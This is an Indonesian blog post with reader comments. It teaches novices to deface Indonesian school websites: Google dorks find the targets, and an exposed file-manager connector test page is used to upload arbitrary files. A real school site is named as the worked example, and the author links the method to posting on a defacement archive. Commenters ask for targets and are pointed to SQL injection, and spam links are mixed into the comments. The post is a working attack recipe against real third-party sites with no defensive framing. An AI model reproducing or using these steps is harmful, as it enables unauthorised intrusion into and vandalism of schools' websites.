Cara Mudah Deface Situs sch.id. Sebenarnya ini cara yang lumayan lama. Namun karena mentok nggak ada bahan postingan, iseng-iseng tadi nambah list deface di indonesiandefacer.org pake cara ini. Mau pake SQLi, males. Kadang discan pake Havij udah nemu password sama usernya malah halaman buat loginnya gak ketemu.
Yaudah, pake cara ini saja. cara ini bisa dibilang cara yang paling mudah karena kita tidak perlu masuk lewat pintu depan/admin. Dan sekalian mau share di blog.
Alat
Google dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
File dengan format txt :
Terserah mau diisi apa. Boleh diisi puisi, misuh-misuh (jangan ding !), atau nomer hape (ini sih orang lebay) . pokoknya terserah deh !!!
langkah-langkah :
1. Masukkan dork diatas di kotak pencarian google.
2. Pilih salah satu situs yang muncul. disini saya ambil contoh : http://www.sman1gombong.sch.id/html/alumni.php
3. Ganti urlnya menjadi editor http://www.sman1gombong.sch.id/filemanager/connectors/test.html
4. Pada opsi connector, pilih PHP. lalu upload file txt milik kamu.
5. Untuk membuka hasilnya, exploitnya adalah http://site.sch.id/userfiles/file/namafile.txt . Jadi untuk contoh saya menjadi http://www.sman1gombong.sch.id/userfiles/file/Wonderk-ID.txt
Selesai !!
Mudah kan ???
Sekian tutorial kali ini. Semoga bermanfaat.
wah mantab Gan. bungkus dulu ia Gan, mau praktek dah malem bngt. besok langsung praktek Gan.
makasih ilmunya met mlm Gan 🙂
Iya. Hehehe
menarik sekali tapi ane gak ikutan gan 😀
Iya. Hehehe
oh gitu to caranya…? terimakasih sobat atas penjelasan dan tutorialnya…?
sayang nih saya pake hp, sedikit kerepotan kalau mau praktek wkwkwkwkwkwkwkw
Oke sob. Hehehe
Hehe…ga ngerti…nih yud…fungsi nya buat apaan ya… 🙂
Payah ya saya… 😀
Buat yang bener2 cupu pengen belajar defacing. Hehehe
dosa mas dosa … nanti di cari sama pak kapolri loh .. hehehe ..
itu cara yang simple tapi apakah 100% work mas?
Ini gk ngerusak database . Cuma upload file. Tingkat keberhasilan 95% . :p
WOKEH MUDAH BANGET SOB, trims pisan sharingnya happy blogging sob
Sama-sama
hehehehhe singgah lagi nie Gan, makasih atas usulnya Gan….!!
kalo ada waktu bole di coba lg,vrivikasi katanya masih pa gak,heee???
met pagi,sukses selalu Gan….!!
Iya sob. Hehehe
Walah saya malah baru tau tentang hal ini sobat… Maklum ketinggalan kereta… Dan perlu registrasi dulu atau kagak itu sob?
Nggak perlu sob. . . Lewat upload. Hehehe
met siang mas waduh mancap,ni mas trmksih banyak mas dah berbagi
Oke sob. . .
Wah keren gan bisa deface web sekolahan..
Hehehe. . Maklum, newbie. :p
kalo ke homepage masih bisa masuk tuh mas o.O
maklumlah masih belum terlalu mengerti samahal ini…
Kalo mau mepes home nya pake sql injection masbro. 😀
datang lagi sobat untuk menginformasikan bahwa link sobat sudah saya kibarkan di blog saya.
saya harap sobat juga bersedia mengibarkan link blog saya di sini.
semoga persahabatan kita makin erat sob…..
Oke sudah. Hehehe
masih bingung!. ini sebenarnya buat apa'an ya?
Buat latian deface bung. 😀
GAn mau tanya ??
Google dork itu apa dan fungsinya apa?
secara simple aja baca di google malah mumet!!
maksudnya 'ganti url jadi editor' tuh apa ?
minta target sob.
Was not found on this server terus sob.
Pake target saya diatas.
kalau pake hp bisa gak cak
bisa brooo. :v
Kurang Jelas Tuh Toritorialnya .. Yang no 3 saya gk jelas
3. Ganti urlnya menjadi editor http://www.sman1gombong.sch.id/filemanager/connectors/test.html
udh gk bisa ya?
Saya senang sekali menemukan postingan anda dan bisa ikut memberi komentar menurut saya sangat berharga sekali bisa membaca tulisan anda, dan pada kesempatan ini akan saya manfaatkan untuk sumber referensi saya
Terima kasih banyak telah berbagi, saya berharap anda terus semangat menulis topik selanjutnya
Paket Outbound Malang
Tempat Outbound Mojokerto
Tempat Outbound Pasuruan
Paket Outbound Kediri
tolong bantu ms( itu gmana ya yg pilih PHP nya?
tolong bantu ms( itu gmana ya yg pilih PHP nya?